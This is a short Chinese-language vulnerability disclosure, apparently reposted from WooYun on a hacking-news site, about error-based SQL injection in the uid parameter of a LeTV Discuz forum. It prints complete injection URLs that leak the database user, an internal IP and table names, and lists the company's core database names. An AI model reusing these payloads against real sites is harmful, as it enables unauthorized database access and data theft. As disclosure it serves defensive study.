记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

乐视某Discuz论坛MySQL报错注入

2014-12-19 23:20

uid可以注入:

code 区域
http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user()) x from information_schema.character_sets group by x)y).html



Error: Duplicate entry '1^^^letv@10.140.202.203' for key 'group_key'

letv_mysqli.png

漏洞证明:

数据库:

code 区域
letv_forum

letv_activity

letv_card

letv_cms

letv_factory_page

letv_intranet

letv_paycenter

letv_sso

letv_tools



可以看到是最核心的几个库。。。



论坛的members表:

http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,(select concat(table_name,0x5e5e,table_schema) from information_schema.tables limit 117,1),0x5e5e5e) x from information_schema.character_sets group by x)y).html



可以较方便地拖库,未进一步测试。

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-081971

阅读:68587 | 评论:0 | 标签:注入 discuz

想收藏或者和大家分享这篇好文章→复制链接地址

“乐视某Discuz论坛MySQL报错注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词